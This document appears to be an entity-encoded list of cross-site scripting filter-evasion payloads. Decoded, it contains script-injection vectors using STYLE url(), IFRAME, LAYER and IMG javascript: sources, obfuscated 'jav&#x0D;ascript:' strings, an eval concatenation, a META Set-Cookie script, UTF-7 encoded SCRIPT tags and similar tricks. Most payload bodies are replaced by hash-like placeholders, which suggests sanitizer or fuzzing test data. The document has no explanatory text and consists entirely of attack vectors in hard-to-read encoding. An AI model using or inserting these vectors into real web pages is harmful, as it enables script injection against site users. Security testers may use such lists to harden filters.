amp;#x3c;&amp;#x2f;&amp;#x53;&amp;#x54;&amp;#x59;&amp;#x4c;&amp;#x45;&amp;#x3e;&amp;#x3c;&amp;#x41;&amp;#x20;&amp;#x43;&amp;#x4c;&amp;#x41;&amp;#x53;&amp;#x53;&amp;#x3d;&amp;#x34;&amp;#x39;&amp;#x32;&amp;#x62;&amp;#x31;&amp;#x64;&amp;#x66;&amp;#x34;&amp;#x38;&amp;#x35;&amp;#x63;&amp;#x38;&amp;#x62;&amp;#x37;&amp;#x65;&amp;#x38;&amp;#x32;&amp;#x35;&amp;#x64;&amp;#x38;&amp;#x30;&amp;#x30;&amp;#x37;&amp;#x66;&amp;#x37;&amp;#x37;&amp;#x61;&amp;#x36;&amp;#x35;&amp;#x38;&amp;#x35;&amp;#x61;&amp;#x3e;&amp;#x3c;&amp;#x2f;&amp;#x41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54;&amp;#x59;&amp;#x4c;&amp;#x45;&amp;#x20;&amp;#x74;&amp;#x79;&amp;#x70;&amp;#x65;&amp;#x3d;&amp;#x22;&amp;#x74;&amp;#x65;&amp;#x78;&amp;#x74;&amp;#x2f;&amp;#x63;&amp;#x73;&amp;#x73;&amp;#x22;&amp;#x3e;&amp;#x42;&amp;#x4f;&amp;#x44;&amp;#x59;&amp;#x7b;&amp;#x62;&amp;#x61;&amp;#x63;&amp;#x6b;&amp;#x67;&amp;#x72;&amp;#x6f;&amp;#x75;&amp;#x6e;&amp;#x64;&amp;#x3a;&amp;#x75;&amp;#x72;&amp;#x6c;&amp;#x28;&amp;#x22;&amp;#x63;&amp;#x62;&amp;#x35;&amp;#x30;&amp;#x37;&amp;#x62;&amp;#x64;&amp;#x62;&amp;#x33;&amp;#x64;&amp;#x31;&amp;#x65;&amp;#x66;&amp;#x61;&amp;#x31;&amp;#x39;&amp;#x39;&amp;#x32;&amp;#x34;&amp;#x34;&amp;#x63;&amp;#x37;&amp;#x65;&amp;#x32;&amp;#x39;&amp;#x35;&amp;#x30;&amp;#x37;&amp;#x34;&amp;#x64;&amp;#x64;&amp;#x35;&amp;#x22;&amp;#x29;&amp;#x7d;&amp;#x3c;&amp;#x2f;&amp;#x53;&amp;#x54;&amp;#x59;&amp;#x4c;&amp;#x4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21;&amp;#x2d;&amp;#x2d;&amp;#x5b;&amp;#x69;&amp;#x66;&amp;#x20;&amp;#x67;&amp;#x74;&amp;#x65;&amp;#x20;&amp;#x49;&amp;#x45;&amp;#x20;&amp;#x34;&amp;#x5d;&amp;#x3e;&amp;#x62;&amp;#x64;&amp;#x38;&amp;#x61;&amp;#x34;&amp;#x62;&amp;#x66;&amp;#x66;&amp;#x32;&amp;#x32;&amp;#x38;&amp;#x31;&amp;#x31;&amp;#x30;&amp;#x36;&amp;#x31;&amp;#x62;&amp;#x65;&amp;#x64;&amp;#x37;&amp;#x36;&amp;#x61;&amp;#x66;&amp;#x38;&amp;#x32;&amp;#x36;&amp;#x31;&amp;#x33;&amp;#x39;&amp;#x36;&amp;#x34;&amp;#x66;&amp;#x3c;&amp;#x21;&amp;#x5b;&amp;#x65;&amp;#x6e;&amp;#x64;&amp;#x69;&amp;#x66;&amp;#x5d;&amp;#x2d;&amp;#x2d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2;&amp;#x41;&amp;#x53;&amp;#x45;&amp;#x20;&amp;#x48;&amp;#x52;&amp;#x45;&amp;#x46;&amp;#x3d;&amp;#x22;&amp;#x38;&amp;#x33;&amp;#x39;&amp;#x62;&amp;#x31;&amp;#x62;&amp;#x66;&amp;#x32;&amp;#x38;&amp;#x66;&amp;#x38;&amp;#x30;&amp;#x33;&amp;#x37;&amp;#x30;&amp;#x30;&amp;#x31;&amp;#x37;&amp;#x36;&amp;#x30;&amp;#x66;&amp;#x39;&amp;#x65;&amp;#x30;&amp;#x65;&amp;#x30;&amp;#x65;&amp;#x33;&amp;#x61;&amp;#x38;&amp;#x62;&amp;#x66;&amp;#x2f;&amp;#x2f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f;&amp;#x42;&amp;#x4a;&amp;#x45;&amp;#x43;&amp;#x54;&amp;#x20;&amp;#x63;&amp;#x6c;&amp;#x61;&amp;#x73;&amp;#x73;&amp;#x69;&amp;#x64;&amp;#x3d;&amp;#x63;&amp;#x6c;&amp;#x73;&amp;#x69;&amp;#x64;&amp;#x3a;&amp;#x61;&amp;#x65;&amp;#x32;&amp;#x34;&amp;#x66;&amp;#x64;&amp;#x61;&amp;#x65;&amp;#x2d;&amp;#x30;&amp;#x33;&amp;#x63;&amp;#x36;&amp;#x2d;&amp;#x31;&amp;#x31;&amp;#x64;&amp;#x31;&amp;#x2d;&amp;#x38;&amp;#x62;&amp;#x37;&amp;#x36;&amp;#x2d;&amp;#x30;&amp;#x30;&amp;#x38;&amp;#x30;&amp;#x63;&amp;#x37;&amp;#x34;&amp;#x34;&amp;#x66;&amp;#x33;&amp;#x38;&amp;#x39;&amp;#x3e;&amp;#x3c;&amp;#x70;&amp;#x61;&amp;#x72;&amp;#x61;&amp;#x6d;&amp;#x20;&amp;#x6e;&amp;#x61;&amp;#x6d;&amp;#x65;&amp;#x3d;&amp;#x75;&amp;#x72;&amp;#x6c;&amp;#x20;&amp;#x76;&amp;#x61;&amp;#x6c;&amp;#x75;&amp;#x65;&amp;#x3d;&amp;#x61;&amp;#x36;&amp;#x66;&amp;#x30;&amp;#x62;&amp;#x32;&amp;#x37;&amp;#x33;&amp;#x63;&amp;#x66;&amp;#x33;&amp;#x37;&amp;#x66;&amp;#x35;&amp;#x32;&amp;#x35;&amp;#x66;&amp;#x34;&amp;#x34;&amp;#x31;&amp;#x35;&amp;#x30;&amp;#x33;&amp;#x62;&amp;#x61;&amp;#x31;&amp;#x36;&amp;#x31;&amp;#x35;&amp;#x64;&amp;#x39;&amp;#x38;&amp;#x3e;&amp;#x3c;&amp;#x2f;&amp;#x4f;&amp;#x42;&amp;#x4a;&amp;#x45;&amp;#x43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61;&amp;#x3d;&amp;#x22;&amp;#x67;&amp;#x65;&amp;#x74;&amp;#x22;&amp;#x3b;&amp;#x62;&amp;#x3d;&amp;#x22;&amp;#x55;&amp;#x52;&amp;#x4c;&amp;#x28;&amp;#x22;&amp;#x22;&amp;#x3b;&amp;#x63;&amp;#x3d;&amp;#x22;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x22;&amp;#x3b;&amp;#x64;&amp;#x3d;&amp;#x22;&amp;#x61;&amp;#x66;&amp;#x37;&amp;#x30;&amp;#x62;&amp;#x38;&amp;#x65;&amp;#x36;&amp;#x34;&amp;#x64;&amp;#x62;&amp;#x36;&amp;#x66;&amp;#x61;&amp;#x62;&amp;#x36;&amp;#x36;&amp;#x32;&amp;#x61;&amp;#x31;&amp;#x64;&amp;#x30;&amp;#x32;&amp;#x39;&amp;#x65;&amp;#x37;&amp;#x61;&amp;#x31;&amp;#x32;&amp;#x35;&amp;#x61;&amp;#x63;&amp;#x22;&amp;#x29;&amp;#x22;&amp;#x3b;&amp;#x65;&amp;#x76;&amp;#x61;&amp;#x6c;&amp;#x28;&amp;#x61;&amp;#x2b;&amp;#x62;&amp;#x2b;&amp;#x63;&amp;#x2b;&amp;#x64;&amp;#x29;&amp;#x3b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3f;&amp;#x20;&amp;#x65;&amp;#x63;&amp;#x68;&amp;#x6f;&amp;#x28;&amp;#x27;&amp;#x3c;&amp;#x53;&amp;#x43;&amp;#x52;&amp;#x29;&amp;#x27;&amp;#x3b;&amp;#x65;&amp;#x63;&amp;#x68;&amp;#x6f;&amp;#x28;&amp;#x27;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x3e;&amp;#x65;&amp;#x63;&amp;#x62;&amp;#x62;&amp;#x37;&amp;#x62;&amp;#x32;&amp;#x64;&amp;#x31;&amp;#x32;&amp;#x64;&amp;#x62;&amp;#x39;&amp;#x63;&amp;#x39;&amp;#x65;&amp;#x31;&amp;#x64;&amp;#x65;&amp;#x33;&amp;#x63;&amp;#x39;&amp;#x66;&amp;#x64;&amp;#x66;&amp;#x33;&amp;#x30;&amp;#x61;&amp;#x36;&amp;#x31;&amp;#x64;&amp;#x39;&amp;#x3c;&amp;#x2f;&amp;#x53;&amp;#x43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x3e;&amp;#x27;&amp;#x29;&amp;#x3b;&amp;#x20;&amp;#x3f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d;&amp;#x45;&amp;#x54;&amp;#x41;&amp;#x20;&amp;#x48;&amp;#x54;&amp;#x54;&amp;#x50;&amp;#x2d;&amp;#x45;&amp;#x51;&amp;#x55;&amp;#x49;&amp;#x56;&amp;#x3d;&amp;#x22;&amp;#x53;&amp;#x65;&amp;#x74;&amp;#x2d;&amp;#x43;&amp;#x6f;&amp;#x6f;&amp;#x6b;&amp;#x69;&amp;#x65;&amp;#x22;&amp;#x20;&amp;#x43;&amp;#x6f;&amp;#x6e;&amp;#x74;&amp;#x65;&amp;#x6e;&amp;#x74;&amp;#x3d;&amp;#x22;&amp;#x55;&amp;#x53;&amp;#x45;&amp;#x52;&amp;#x49;&amp;#x44;&amp;#x3d;&amp;#x26;&amp;#x6c;&amp;#x74;&amp;#x3b;&amp;#x53;&amp;#x43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x26;&amp;#x67;&amp;#x74;&amp;#x3b;&amp;#x63;&amp;#x61;&amp;#x65;&amp;#x38;&amp;#x61;&amp;#x32;&amp;#x39;&amp;#x39;&amp;#x62;&amp;#x35;&amp;#x31;&amp;#x32;&amp;#x34;&amp;#x34;&amp;#x35;&amp;#x36;&amp;#x39;&amp;#x62;&amp;#x66;&amp;#x35;&amp;#x64;&amp;#x38;&amp;#x62;&amp;#x38;&amp;#x38;&amp;#x38;&amp;#x38;&amp;#x31;&amp;#x32;&amp;#x33;&amp;#x65;&amp;#x64;&amp;#x26;&amp;#x6c;&amp;#x74;&amp;#x3b;&amp;#x2f;&amp;#x53;&amp;#x43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x26;&amp;#x67;&amp;#x74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43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x20;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x68;&amp;#x74;&amp;#x74;&amp;#x70;&amp;#x3a;&amp;#x2f;&amp;#x2f;&amp;#x31;&amp;#x32;&amp;#x37;&amp;#x2e;&amp;#x30;&amp;#x2e;&amp;#x30;&amp;#x2e;&amp;#x31;&amp;#x3e;&amp;#x38;&amp;#x36;&amp;#x61;&amp;#x32;&amp;#x30;&amp;#x36;&amp;#x36;&amp;#x37;&amp;#x39;&amp;#x66;&amp;#x66;&amp;#x37;&amp;#x33;&amp;#x62;&amp;#x39;&amp;#x30;&amp;#x62;&amp;#x37;&amp;#x31;&amp;#x63;&amp;#x62;&amp;#x33;&amp;#x32;&amp;#x65;&amp;#x62;&amp;#x35;&amp;#x31;&amp;#x39;&amp;#x65;&amp;#x38;&amp;#x36;&amp;#x31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26;&amp;#x31;&amp;#x34;&amp;#x3b;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x30;&amp;#x38;&amp;#x37;&amp;#x38;&amp;#x34;&amp;#x35;&amp;#x32;&amp;#x36;&amp;#x37;&amp;#x33;&amp;#x35;&amp;#x33;&amp;#x64;&amp;#x34;&amp;#x34;&amp;#x35;&amp;#x61;&amp;#x65;&amp;#x31;&amp;#x63;&amp;#x65;&amp;#x35;&amp;#x36;&amp;#x36;&amp;#x30;&amp;#x62;&amp;#x38;&amp;#x39;&amp;#x37;&amp;#x65;&amp;#x30;&amp;#x64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2;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x26;&amp;#x23;&amp;#x78;&amp;#x30;&amp;#x44;&amp;#x3b;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x65;&amp;#x38;&amp;#x61;&amp;#x33;&amp;#x30;&amp;#x63;&amp;#x32;&amp;#x38;&amp;#x31;&amp;#x63;&amp;#x35;&amp;#x37;&amp;#x39;&amp;#x61;&amp;#x33;&amp;#x63;&amp;#x31;&amp;#x64;&amp;#x30;&amp;#x33;&amp;#x36;&amp;#x39;&amp;#x38;&amp;#x34;&amp;#x64;&amp;#x33;&amp;#x62;&amp;#x66;&amp;#x30;&amp;#x31;&amp;#x63;&amp;#x30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d;&amp;#x2d;&amp;#x2d;&amp;#x20;&amp;#x3c;&amp;#x49;&amp;#x4d;&amp;#x47;&amp;#x20;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x22;&amp;#x20;&amp;#x26;&amp;#x23;&amp;#x31;&amp;#x34;&amp;#x3b;&amp;#x20;&amp;#x20;&amp;#x34;&amp;#x33;&amp;#x34;&amp;#x66;&amp;#x63;&amp;#x33;&amp;#x30;&amp;#x36;&amp;#x34;&amp;#x61;&amp;#x31;&amp;#x37;&amp;#x36;&amp;#x37;&amp;#x61;&amp;#x31;&amp;#x62;&amp;#x37;&amp;#x66;&amp;#x35;&amp;#x31;&amp;#x65;&amp;#x65;&amp;#x31;&amp;#x33;&amp;#x63;&amp;#x33;&amp;#x39;&amp;#x63;&amp;#x37;&amp;#x61;&amp;#x63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d;&amp;#x2d;&amp;#x2d;&amp;#x20;&amp;#x3c;&amp;#x49;&amp;#x4d;&amp;#x47;&amp;#x20;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x22;&amp;#x38;&amp;#x33;&amp;#x32;&amp;#x63;&amp;#x39;&amp;#x33;&amp;#x31;&amp;#x37;&amp;#x35;&amp;#x63;&amp;#x64;&amp;#x30;&amp;#x32;&amp;#x38;&amp;#x35;&amp;#x65;&amp;#x31;&amp;#x33;&amp;#x32;&amp;#x61;&amp;#x66;&amp;#x30;&amp;#x66;&amp;#x62;&amp;#x35;&amp;#x39;&amp;#x61;&amp;#x38;&amp;#x64;&amp;#x66;&amp;#x39;&amp;#x32;&amp;#x22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43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x3e;&amp;#x61;&amp;#x3d;&amp;#x2f;&amp;#x64;&amp;#x64;&amp;#x31;&amp;#x36;&amp;#x31;&amp;#x37;&amp;#x31;&amp;#x65;&amp;#x64;&amp;#x31;&amp;#x37;&amp;#x65;&amp;#x63;&amp;#x63;&amp;#x31;&amp;#x30;&amp;#x33;&amp;#x64;&amp;#x63;&amp;#x65;&amp;#x63;&amp;#x62;&amp;#x39;&amp;#x36;&amp;#x34;&amp;#x33;&amp;#x62;&amp;#x61;&amp;#x31;&amp;#x32;&amp;#x30;&amp;#x62;&amp;#x2f;&amp;#x61;&amp;#x6c;&amp;#x65;&amp;#x72;&amp;#x74;&amp;#x28;&amp;#x61;&amp;#x2e;&amp;#x73;&amp;#x6f;&amp;#x75;&amp;#x72;&amp;#x63;&amp;#x65;&amp;#x29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d;&amp;#x2d;&amp;#x2d;&amp;#x20;&amp;#x22;&amp;#x3b;&amp;#x62;&amp;#x39;&amp;#x37;&amp;#x32;&amp;#x64;&amp;#x63;&amp;#x39;&amp;#x64;&amp;#x65;&amp;#x64;&amp;#x35;&amp;#x32;&amp;#x31;&amp;#x65;&amp;#x66;&amp;#x63;&amp;#x62;&amp;#x64;&amp;#x32;&amp;#x39;&amp;#x33;&amp;#x34;&amp;#x38;&amp;#x61;&amp;#x38;&amp;#x33;&amp;#x30;&amp;#x39;&amp;#x38;&amp;#x64;&amp;#x39;&amp;#x35;&amp;#x3b;&amp;#x2f;&amp;#x2f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d;&amp;#x45;&amp;#x54;&amp;#x41;&amp;#x20;&amp;#x48;&amp;#x54;&amp;#x54;&amp;#x50;&amp;#x2d;&amp;#x45;&amp;#x51;&amp;#x55;&amp;#x49;&amp;#x56;&amp;#x6f;&amp;#x22;&amp;#x72;&amp;#x65;&amp;#x66;&amp;#x72;&amp;#x65;&amp;#x73;&amp;#x68;&amp;#x22;&amp;#x20;&amp;#x43;&amp;#x4f;&amp;#x4e;&amp;#x54;&amp;#x45;&amp;#x4e;&amp;#x54;&amp;#x3d;&amp;#x22;&amp;#x30;&amp;#x3b;&amp;#x20;&amp;#x55;&amp;#x52;&amp;#x4c;&amp;#x3d;&amp;#x68;&amp;#x74;&amp;#x74;&amp;#x70;&amp;#x3a;&amp;#x2f;&amp;#x2f;&amp;#x3b;&amp;#x55;&amp;#x52;&amp;#x4c;&amp;#x3d;&amp;#x39;&amp;#x33;&amp;#x30;&amp;#x36;&amp;#x31;&amp;#x65;&amp;#x37;&amp;#x65;&amp;#x38;&amp;#x62;&amp;#x62;&amp;#x38;&amp;#x37;&amp;#x62;&amp;#x34;&amp;#x33;&amp;#x37;&amp;#x63;&amp;#x65;&amp;#x62;&amp;#x38;&amp;#x62;&amp;#x66;&amp;#x62;&amp;#x39;&amp;#x34;&amp;#x34;&amp;#x35;&amp;#x39;&amp;#x35;&amp;#x63;&amp;#x65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43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x20;&amp;#x3c;&amp;#x42;&amp;#x3e;&amp;#x3d;&amp;#x65;&amp;#x39;&amp;#x33;&amp;#x36;&amp;#x35;&amp;#x39;&amp;#x61;&amp;#x37;&amp;#x64;&amp;#x33;&amp;#x38;&amp;#x36;&amp;#x39;&amp;#x61;&amp;#x64;&amp;#x38;&amp;#x36;&amp;#x61;&amp;#x31;&amp;#x62;&amp;#x61;&amp;#x33;&amp;#x30;&amp;#x39;&amp;#x30;&amp;#x66;&amp;#x34;&amp;#x66;&amp;#x36;&amp;#x31;&amp;#x32;&amp;#x31;&amp;#x22;&amp;#x3e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6;&amp;#x52;&amp;#x41;&amp;#x4d;&amp;#x45;&amp;#x20;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x22;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x37;&amp;#x61;&amp;#x35;&amp;#x62;&amp;#x62;&amp;#x33;&amp;#x64;&amp;#x62;&amp;#x63;&amp;#x33;&amp;#x65;&amp;#x65;&amp;#x61;&amp;#x66;&amp;#x39;&amp;#x32;&amp;#x64;&amp;#x37;&amp;#x62;&amp;#x36;&amp;#x64;&amp;#x39;&amp;#x35;&amp;#x62;&amp;#x64;&amp;#x65;&amp;#x63;&amp;#x61;&amp;#x30;&amp;#x64;&amp;#x37;&amp;#x36;&amp;#x20;&amp;#x3c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43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x3e;&amp;#x61;&amp;#x3d;&amp;#x2f;&amp;#x31;&amp;#x37;&amp;#x34;&amp;#x64;&amp;#x39;&amp;#x62;&amp;#x34;&amp;#x36;&amp;#x33;&amp;#x35;&amp;#x34;&amp;#x30;&amp;#x63;&amp;#x31;&amp;#x35;&amp;#x38;&amp;#x39;&amp;#x35;&amp;#x61;&amp;#x61;&amp;#x35;&amp;#x63;&amp;#x38;&amp;#x35;&amp;#x34;&amp;#x64;&amp;#x61;&amp;#x38;&amp;#x33;&amp;#x36;&amp;#x32;&amp;#x35;&amp;#x2f;&amp;#x6e;&amp;#x31;&amp;#x37;&amp;#x34;&amp;#x64;&amp;#x39;&amp;#x62;&amp;#x34;&amp;#x36;&amp;#x33;&amp;#x35;&amp;#x34;&amp;#x30;&amp;#x63;&amp;#x31;&amp;#x35;&amp;#x38;&amp;#x39;&amp;#x35;&amp;#x61;&amp;#x61;&amp;#x35;&amp;#x63;&amp;#x38;&amp;#x35;&amp;#x34;&amp;#x64;&amp;#x61;&amp;#x38;&amp;#x33;&amp;#x36;&amp;#x32;&amp;#x35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c;&amp;#x41;&amp;#x59;&amp;#x45;&amp;#x52;&amp;#x20;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x22;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x39;&amp;#x30;&amp;#x36;&amp;#x64;&amp;#x37;&amp;#x39;&amp;#x66;&amp;#x38;&amp;#x31;&amp;#x61;&amp;#x37;&amp;#x34;&amp;#x37;&amp;#x36;&amp;#x37;&amp;#x64;&amp;#x61;&amp;#x63;&amp;#x35;&amp;#x64;&amp;#x64;&amp;#x64;&amp;#x35;&amp;#x34;&amp;#x31;&amp;#x36;&amp;#x66;&amp;#x65;&amp;#x36;&amp;#x36;&amp;#x34;&amp;#x31;&amp;#x3e;&amp;#x3c;&amp;#x2f;&amp;#x4c;&amp;#x41;&amp;#x59;&amp;#x45;&amp;#x5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3;&amp;#x54;&amp;#x59;&amp;#x4c;&amp;#x45;&amp;#x3e;&amp;#x6c;&amp;#x69;&amp;#x20;&amp;#x7b;&amp;#x6c;&amp;#x69;&amp;#x73;&amp;#x74;&amp;#x2d;&amp;#x73;&amp;#x74;&amp;#x79;&amp;#x6c;&amp;#x65;&amp;#x2d;&amp;#x69;&amp;#x6d;&amp;#x61;&amp;#x67;&amp;#x65;&amp;#x3a;&amp;#x20;&amp;#x75;&amp;#x72;&amp;#x6c;&amp;#x28;&amp;#x22;&amp;#x39;&amp;#x32;&amp;#x63;&amp;#x62;&amp;#x36;&amp;#x63;&amp;#x30;&amp;#x37;&amp;#x35;&amp;#x64;&amp;#x65;&amp;#x32;&amp;#x65;&amp;#x35;&amp;#x65;&amp;#x32;&amp;#x31;&amp;#x61;&amp;#x38;&amp;#x35;&amp;#x31;&amp;#x36;&amp;#x65;&amp;#x31;&amp;#x36;&amp;#x36;&amp;#x38;&amp;#x36;&amp;#x31;&amp;#x38;&amp;#x64;&amp;#x63;&amp;#x3c;&amp;#x2f;&amp;#x53;&amp;#x54;&amp;#x59;&amp;#x4c;&amp;#x45;&amp;#x3e;&amp;#x3c;&amp;#x55;&amp;#x4c;&amp;#x3e;&amp;#x3c;&amp;#x4c;&amp;#x49;&amp;#x3e;&amp;#x39;&amp;#x32;&amp;#x63;&amp;#x62;&amp;#x36;&amp;#x63;&amp;#x30;&amp;#x37;&amp;#x35;&amp;#x64;&amp;#x65;&amp;#x32;&amp;#x65;&amp;#x35;&amp;#x65;&amp;#x32;&amp;#x31;&amp;#x61;&amp;#x38;&amp;#x35;&amp;#x31;&amp;#x36;&amp;#x65;&amp;#x31;&amp;#x36;&amp;#x36;&amp;#x38;&amp;#x36;&amp;#x31;&amp;#x38;&amp;#x64;&amp;#x63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1;&amp;#x63;&amp;#x6b;&amp;#x67;&amp;#x72;&amp;#x6f;&amp;#x75;&amp;#x6e;&amp;#x64;&amp;#x2d;&amp;#x69;&amp;#x6d;&amp;#x61;&amp;#x67;&amp;#x65;&amp;#x3a;&amp;#x20;&amp;#x75;&amp;#x72;&amp;#x6c;&amp;#x28;&amp;#x26;&amp;#x23;&amp;#x31;&amp;#x3b;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x35;&amp;#x39;&amp;#x63;&amp;#x31;&amp;#x38;&amp;#x64;&amp;#x63;&amp;#x63;&amp;#x30;&amp;#x33;&amp;#x62;&amp;#x65;&amp;#x34;&amp;#x34;&amp;#x32;&amp;#x30;&amp;#x65;&amp;#x30;&amp;#x33;&amp;#x38;&amp;#x34;&amp;#x37;&amp;#x66;&amp;#x31;&amp;#x33;&amp;#x65;&amp;#x35;&amp;#x33;&amp;#x39;&amp;#x36;&amp;#x34;&amp;#x3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8;&amp;#x45;&amp;#x41;&amp;#x44;&amp;#x3e;&amp;#x3c;&amp;#x4d;&amp;#x45;&amp;#x54;&amp;#x41;&amp;#x20;&amp;#x48;&amp;#x54;&amp;#x54;&amp;#x50;&amp;#x2d;&amp;#x45;&amp;#x51;&amp;#x55;&amp;#x49;&amp;#x56;&amp;#x3d;&amp;#x22;&amp;#x43;&amp;#x4f;&amp;#x4e;&amp;#x54;&amp;#x45;&amp;#x4e;&amp;#x54;&amp;#x2d;&amp;#x54;&amp;#x59;&amp;#x50;&amp;#x45;&amp;#x22;&amp;#x20;&amp;#x43;&amp;#x4f;&amp;#x4e;&amp;#x54;&amp;#x45;&amp;#x4e;&amp;#x54;&amp;#x3d;&amp;#x22;&amp;#x74;&amp;#x65;&amp;#x78;&amp;#x74;&amp;#x2f;&amp;#x68;&amp;#x74;&amp;#x6d;&amp;#x6c;&amp;#x3b;&amp;#x20;&amp;#x63;&amp;#x68;&amp;#x61;&amp;#x72;&amp;#x73;&amp;#x65;&amp;#x74;&amp;#x3d;&amp;#x55;&amp;#x54;&amp;#x46;&amp;#x2d;&amp;#x37;&amp;#x22;&amp;#x3e;&amp;#x3c;&amp;#x2f;&amp;#x48;&amp;#x45;&amp;#x41;&amp;#x44;&amp;#x3e;&amp;#x2b;&amp;#x41;&amp;#x44;&amp;#x77;&amp;#x2d;&amp;#x53;&amp;#x43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x2b;&amp;#x41;&amp;#x44;&amp;#x34;&amp;#x2d;&amp;#x61;&amp;#x65;&amp;#x32;&amp;#x37;&amp;#x31;&amp;#x61;&amp;#x39;&amp;#x34;&amp;#x33;&amp;#x31;&amp;#x30;&amp;#x30;&amp;#x39;&amp;#x35;&amp;#x64;&amp;#x36;&amp;#x33;&amp;#x37;&amp;#x31;&amp;#x33;&amp;#x63;&amp;#x61;&amp;#x65;&amp;#x38;&amp;#x38;&amp;#x65;&amp;#x34;&amp;#x31;&amp;#x36;&amp;#x61;&amp;#x64;&amp;#x61;&amp;#x2b;&amp;#x41;&amp;#x44;&amp;#x77;&amp;#x2d;&amp;#x2f;&amp;#x53;&amp;#x43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x2b;&amp;#x41;&amp;#x44;&amp;#x34;&amp;#x2d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1;&amp;#x20;&amp;#x68;&amp;#x72;&amp;#x65;&amp;#x66;&amp;#x3d;&amp;#x22;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x23;&amp;#x37;&amp;#x64;&amp;#x33;&amp;#x64;&amp;#x35;&amp;#x35;&amp;#x31;&amp;#x62;&amp;#x39;&amp;#x65;&amp;#x66;&amp;#x32;&amp;#x36;&amp;#x63;&amp;#x33;&amp;#x66;&amp;#x35;&amp;#x33;&amp;#x66;&amp;#x35;&amp;#x32;&amp;#x63;&amp;#x33;&amp;#x61;&amp;#x62;&amp;#x64;&amp;#x38;&amp;#x63;&amp;#x30;&amp;#x36;&amp;#x61;&amp;#x64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e;&amp;#x70;&amp;#x75;&amp;#x74;&amp;#x20;&amp;#x74;&amp;#x79;&amp;#x70;&amp;#x65;&amp;#x3d;&amp;#x22;&amp;#x69;&amp;#x6d;&amp;#x61;&amp;#x67;&amp;#x65;&amp;#x22;&amp;#x20;&amp;#x64;&amp;#x79;&amp;#x6e;&amp;#x73;&amp;#x72;&amp;#x63;&amp;#x3d;&amp;#x22;&amp;#x64;&amp;#x61;&amp;#x37;&amp;#x64;&amp;#x65;&amp;#x32;&amp;#x35;&amp;#x35;&amp;#x37;&amp;#x66;&amp;#x62;&amp;#x34;&amp;#x64;&amp;#x33;&amp;#x36;&amp;#x62;&amp;#x64;&amp;#x64;&amp;#x37;&amp;#x61;&amp;#x61;&amp;#x65;&amp;#x30;&amp;#x33;&amp;#x65;&amp;#x32;&amp;#x63;&amp;#x62;&amp;#x36;&amp;#x38;&amp;#x65;&amp;#x34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6;&amp;#x31;&amp;#x63;&amp;#x37;&amp;#x66;&amp;#x66;&amp;#x64;&amp;#x33;&amp;#x32;&amp;#x61;&amp;#x34;&amp;#x63;&amp;#x32;&amp;#x62;&amp;#x66;&amp;#x37;&amp;#x65;&amp;#x30;&amp;#x33;&amp;#x64;&amp;#x34;&amp;#x64;&amp;#x35;&amp;#x30;&amp;#x35;&amp;#x30;&amp;#x62;&amp;#x34;&amp;#x36;&amp;#x34;&amp;#x63;&amp;#x32;&amp;#x38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6;&amp;#x7b;&amp;#x62;&amp;#x36;&amp;#x33;&amp;#x30;&amp;#x38;&amp;#x33;&amp;#x38;&amp;#x39;&amp;#x34;&amp;#x61;&amp;#x66;&amp;#x32;&amp;#x36;&amp;#x36;&amp;#x36;&amp;#x39;&amp;#x34;&amp;#x66;&amp;#x61;&amp;#x34;&amp;#x65;&amp;#x62;&amp;#x38;&amp;#x62;&amp;#x39;&amp;#x38;&amp;#x65;&amp;#x33;&amp;#x65;&amp;#x33;&amp;#x33;&amp;#x34;&amp;#x7d;&amp;#x3b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9;&amp;#x4d;&amp;#x47;&amp;#x20;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x26;&amp;#x7b;&amp;#x63;&amp;#x39;&amp;#x65;&amp;#x37;&amp;#x66;&amp;#x62;&amp;#x66;&amp;#x31;&amp;#x64;&amp;#x61;&amp;#x35;&amp;#x65;&amp;#x30;&amp;#x38;&amp;#x31;&amp;#x63;&amp;#x36;&amp;#x31;&amp;#x37;&amp;#x34;&amp;#x62;&amp;#x31;&amp;#x62;&amp;#x61;&amp;#x31;&amp;#x31;&amp;#x36;&amp;#x62;&amp;#x38;&amp;#x31;&amp;#x30;&amp;#x62;&amp;#x7d;&amp;#x3b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1;&amp;#x20;&amp;#x68;&amp;#x72;&amp;#x65;&amp;#x66;&amp;#x3d;&amp;#x22;&amp;#x61;&amp;#x62;&amp;#x6f;&amp;#x75;&amp;#x74;&amp;#x